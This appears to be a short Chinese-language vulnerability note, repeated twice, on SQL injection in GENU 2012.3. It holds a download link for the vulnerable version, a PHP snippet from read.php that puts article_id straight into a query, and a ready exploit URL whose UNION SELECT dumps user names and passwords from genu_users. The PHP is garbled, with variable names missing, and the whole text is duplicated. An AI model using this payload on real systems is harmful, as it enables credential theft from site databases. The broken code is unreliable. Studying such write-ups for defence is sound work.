VULHUB ™

### 0x01 漏洞版本软件下载 下载地址： ``` http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz ``` ### 0x02 漏洞代码 read.php ``` include('./../includes/common.php'); page_header(['ARTICLES_READ_TITLE']); if (isset(['article_id'])) { ->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . ' WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id AND ' . TABLE_ARTICLES . '.article_id = ' . ['article_id']); = ->fetch(); [...] ``` ### 0x01 漏洞利用 ``` http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users-- ``` 返回数据库用户名密码

### 0x01 漏洞版本软件下载 下载地址： ``` http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz ``` ### 0x02 漏洞代码 read.php ``` include('./../includes/common.php'); page_header(['ARTICLES_READ_TITLE']); if (isset(['article_id'])) { ->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . ' WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id AND ' . TABLE_ARTICLES . '.article_id = ' . ['article_id']); = ->fetch(); [...] ``` ### 0x01 漏洞利用 ``` http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users-- ``` 返回数据库用户名密码